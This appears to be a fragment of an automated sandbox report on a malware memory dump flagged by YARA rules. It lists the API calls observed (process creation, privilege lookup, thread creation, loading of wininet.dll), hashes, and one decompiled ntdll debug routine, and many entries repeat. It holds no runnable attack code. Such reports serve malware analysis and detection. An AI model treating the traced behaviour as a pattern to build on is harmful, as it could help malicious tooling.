                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • Sleep.KERNELBASE(000007D0), ref: 030E6F88
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, Offset: 030D0000, based on PE: false
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Sleep
                                                                                  • String ID: net.dll$wininet.dll
                                                                                  • API String ID: 3472027048-1269752229
                                                                                  • Opcode ID: a6c48969d60db3ceed74e40211ad581f30d69321df0dca94363978bf35b7afca
                                                                                  • Instruction ID: 6c73b718d0aa2fd0ee2a300f5c88c85d5ed5691021858f04a009130d6da570dc
                                                                                  • Opcode Fuzzy Hash: a6c48969d60db3ceed74e40211ad581f30d69321df0dca94363978bf35b7afca
                                                                                  • Instruction Fuzzy Hash: 143181B5602708AFC715DF68D8A0FABB7F8FB88700F04855DF61A5B241D771A545CBA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • Sleep.KERNELBASE(000007D0), ref: 030E6F88
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, Offset: 030D0000, based on PE: false
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Sleep
                                                                                  • String ID: net.dll$wininet.dll
                                                                                  • API String ID: 3472027048-1269752229
                                                                                  • Opcode ID: 963afd7b734922ea1f6b313fb063d5fb129ffd9ee3720c61779108ea36705dfa
                                                                                  • Instruction ID: 11850df225ce58da8b32b2b7bc4455dd0c5aafd6811aed2fdef0752b1bcf846a
                                                                                  • Opcode Fuzzy Hash: 963afd7b734922ea1f6b313fb063d5fb129ffd9ee3720c61779108ea36705dfa
                                                                                  • Instruction Fuzzy Hash: 2F31B4B6702308AFC714DF54E8A1FABB7F8EB98310F048069F6195B241D775A455CBE1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,030D3B93), ref: 030E84FD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, Offset: 030D0000, based on PE: false
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FreeHeap
                                                                                  • String ID: .z`
                                                                                  • API String ID: 3298025750-1441809116
                                                                                  • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                  • Instruction ID: 5ccb2c4aba946b77616cf74f5b6b9f2131e708d918022a190f4389c9e5781437
                                                                                  • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                  • Instruction Fuzzy Hash: 01E012B6200208ABDB18EF99CC48EA777ACAF88650F018558FA085B241CA30E910CAB0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 030D72BA
                                                                                  • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 030D72DB
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, Offset: 030D0000, based on PE: false
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MessagePostThread
                                                                                  • String ID:
                                                                                  • API String ID: 1836367815-0
                                                                                  • Opcode ID: 8b955aa86635726f2346a9c8d52cc1bf7f5856a12dc46368d73d443070a20bca
                                                                                  • Instruction ID: 721c1afb2e2821ee7352d013376cc4705bd00a9c0ff23f270c84568da8edd0b3
                                                                                  • Opcode Fuzzy Hash: 8b955aa86635726f2346a9c8d52cc1bf7f5856a12dc46368d73d443070a20bca
                                                                                  • Instruction Fuzzy Hash: 0101A235A823287AE720EA948C42FFEB7AC9B80F50F150159FF04BE1C0E694690687F5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 030D9B92
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, Offset: 030D0000, based on PE: false
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Load
                                                                                  • String ID:
                                                                                  • API String ID: 2234796835-0
                                                                                  • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                  • Instruction ID: c623c1e78301eb8387fba440cc170ed87d9c5e23fb196e9ad45ea95ae8d14071
                                                                                  • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                  • Instruction Fuzzy Hash: E10108B9E0120DABDB10EAA4DD41FDEB7B89B44208F0441A5A9089B281F631EA18CB91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 030E8594
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, Offset: 030D0000, based on PE: false
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateInternalProcess
                                                                                  • String ID:
                                                                                  • API String ID: 2186235152-0
                                                                                  • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                  • Instruction ID: 549f8fa6a732bda4c0115391e206cad343036ff7cc013835bbc1763ea4b8e4ad
                                                                                  • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                  • Instruction Fuzzy Hash: A201AFB2214208AFCB54DF89DC80EEB77ADAF8C754F158258FA0D97240C630E851CBA4
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 030E8594
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, Offset: 030D0000, based on PE: false
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateInternalProcess
                                                                                  • String ID:
                                                                                  • API String ID: 2186235152-0
                                                                                  • Opcode ID: 1a3554c41a9f0d6a3275fd6e07cdc687f2237a69a707faacc0d9be122fd7795f
                                                                                  • Instruction ID: 745e00a6bfde2ccb17907fc97e5256104b1bf19a2bb34e611e02f55e97729bdd
                                                                                  • Opcode Fuzzy Hash: 1a3554c41a9f0d6a3275fd6e07cdc687f2237a69a707faacc0d9be122fd7795f
                                                                                  • Instruction Fuzzy Hash: 4101B2B6205108BFCB54DF99DC80EEB77ADAF8C754F158248FA0DA7251C630E851CBA4
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,030DCFA2,030DCFA2,?,00000000,?,?), ref: 030E8660
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, Offset: 030D0000, based on PE: false
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LookupPrivilegeValue
                                                                                  • String ID:
                                                                                  • API String ID: 3899507212-0
                                                                                  • Opcode ID: 9eed4e7e919a44c000353b36706b80de4e9123cfab0341f443dddb310e560443
                                                                                  • Instruction ID: 1190189ad81b2328a2a1abe57fe473d802151faf74c1e54970cef90bb7d8902a
                                                                                  • Opcode Fuzzy Hash: 9eed4e7e919a44c000353b36706b80de4e9123cfab0341f443dddb310e560443
                                                                                  • Instruction Fuzzy Hash: 4CF090B5201218AFDB14DFA4DC44EEBB79DEF85B20F058199FA4C6B211CA31E804CBB0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,030DCCD0,?,?), ref: 030E704C
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, Offset: 030D0000, based on PE: false
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateThread
                                                                                  • String ID:
                                                                                  • API String ID: 2422867632-0
                                                                                  • Opcode ID: e8a682d6ca176058e0d851ff1510c3e9173edc0f8f67161c925dea0b5d29092c
                                                                                  • Instruction ID: 6fff31011248e293b0d1fc8e59cdb3fe884e02b91f308309f9943441d3ed4d5c
                                                                                  • Opcode Fuzzy Hash: e8a682d6ca176058e0d851ff1510c3e9173edc0f8f67161c925dea0b5d29092c
                                                                                  • Instruction Fuzzy Hash: DDE06D373923043AE230A5999C02FE7B39CDB81B21F540066FA0DEB2C0D595F80142A5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,030DCFA2,030DCFA2,?,00000000,?,?), ref: 030E8660
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, Offset: 030D0000, based on PE: false
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LookupPrivilegeValue
                                                                                  • String ID:
                                                                                  • API String ID: 3899507212-0
                                                                                  • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                  • Instruction ID: 10ee5b85ae83c309c1335805f61902fb9382c6df19648d67889ab667b41fd69f
                                                                                  • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                  • Instruction Fuzzy Hash: AEE01AB52002086BDB10DF89CC84EE777ADAF88650F018554FA085B241C930E8108BF5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL(030E3516,?,030E3C8F,030E3C8F,?,030E3516,?,?,?,?,?,00000000,00000000,?), ref: 030E84BD
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, Offset: 030D0000, based on PE: false
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 1279760036-0
                                                                                  • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                  • Instruction ID: 3f96646cd40fc0c0d7441a2fed9a20582a57cd5dd0cd0da7688cac9c00b34a6e
                                                                                  • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                  • Instruction Fuzzy Hash: 9FE012B6200208ABDB14EF99CC40EA777ACAF88650F118558FA085B241CA30F910CAB0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • SetErrorMode.KERNELBASE(00008003,?,?,030D7C63,?), ref: 030DD43B
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, Offset: 030D0000, based on PE: false
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorMode
                                                                                  • String ID:
                                                                                  • API String ID: 2340568224-0
                                                                                  • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                                  • Instruction ID: 8b0d0e1d4971524f9c39dc6ddd793aec44d805183cd9722effd9ddafd2b61d74
                                                                                  • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                                  • Instruction Fuzzy Hash: F7D0A7757903043BE610FBA89C03F6672CC5B54A00F4940A4F949DB3C3D950F4004561
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.495692173.0000000005050000.00000040.00000001.sdmp, Offset: 05050000, based on PE: true
                                                                                  • Associated: 0000000E.00000002.496050799.000000000516B000.00000040.00000001.sdmp Download File
                                                                                  • Associated: 0000000E.00000002.496077545.000000000516F000.00000040.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: e55caffc22d83ddd0ac906e67a161ae1b8c016e62b62da27ee9c416e3ae4b9c2
                                                                                  • Instruction ID: 916b9f9cc9ec401eb6bbbfb989198c497c1f53530fd2980f76144736ef41a135
                                                                                  • Opcode Fuzzy Hash: e55caffc22d83ddd0ac906e67a161ae1b8c016e62b62da27ee9c416e3ae4b9c2
                                                                                  • Instruction Fuzzy Hash: 0BB09B729014C5C5E751D7605688B2F7E5177D1741F66C466D2020681A4778C091F5B5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Non-executed Functions

                                                                                  C-Code - Quality: 53%
                                                                                  			E0510FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                                  				void* _t7;
                                                                                  				intOrPtr _t9;
                                                                                  				intOrPtr _t10;
                                                                                  				intOrPtr* _t12;
                                                                                  				intOrPtr* _t13;
                                                                                  				intOrPtr _t14;
                                                                                  				intOrPtr* _t15;
                                                                                  
                                                                                  				_t13 = __edx;
                                                                                  				_push(_a4);
                                                                                  				_t14 =  *[fs:0x18];
                                                                                  				_t15 = _t12;
                                                                                  				_t7 = E050BCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                                  				_push(_t13);
                                                                                  				E05105720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                                  				_t9 =  *_t15;
                                                                                  				if(_t9 == 0xffffffff) {
                                                                                  					_t10 = 0;
                                                                                  				} else {
                                                                                  					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                                  				}
                                                                                  				_push(_t10);
                                                                                  				_push(_t15);
                                                                                  				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                                                  				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                                  				return E05105720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                                  			}










                                                                                  0x0510fdda
                                                                                  0x0510fde2
                                                                                  0x0510fde5
                                                                                  0x0510fdec
                                                                                  0x0510fdfa
                                                                                  0x0510fdff
                                                                                  0x0510fe0a
                                                                                  0x0510fe0f
                                                                                  0x0510fe17
                                                                                  0x0510fe1e
                                                                                  0x0510fe19
                                                                                  0x0510fe19
                                                                                  0x0510fe19
                                                                                  0x0510fe20
                                                                                  0x0510fe21
                                                                                  0x0510fe22
                                                                                  0x0510fe25
                                                                                  0x0510fe40

                                                                                  APIs
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0510FDFA
                                                                                  Strings
                                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0510FE01
                                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0510FE2B
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.495692173.0000000005050000.00000040.00000001.sdmp, Offset: 05050000, based on PE: true
                                                                                  • Associated: 0000000E.00000002.496050799.000000000516B000.00000040.00000001.sdmp Download File
                                                                                  • Associated: 0000000E.00000002.496077545.000000000516F000.00000040.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                  • API String ID: 885266447-3903918235
                                                                                  • Opcode ID: 3d8c6b85e3c6ea1ed9e61492f6aa21e7832ca533809b5427898a8ff3a0d26205
                                                                                  • Instruction ID: e54de447d7c08d37536b771cea1f5a57a3e1227cae79fd50e742a39f8b6b9e34
                                                                                  • Opcode Fuzzy Hash: 3d8c6b85e3c6ea1ed9e61492f6aa21e7832ca533809b5427898a8ff3a0d26205
                                                                                  • Instruction Fuzzy Hash: 7BF0F636240201BFE6341A45DC4AF77BB5BEB44770F151314F6285A1D1DAA2F86096F0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%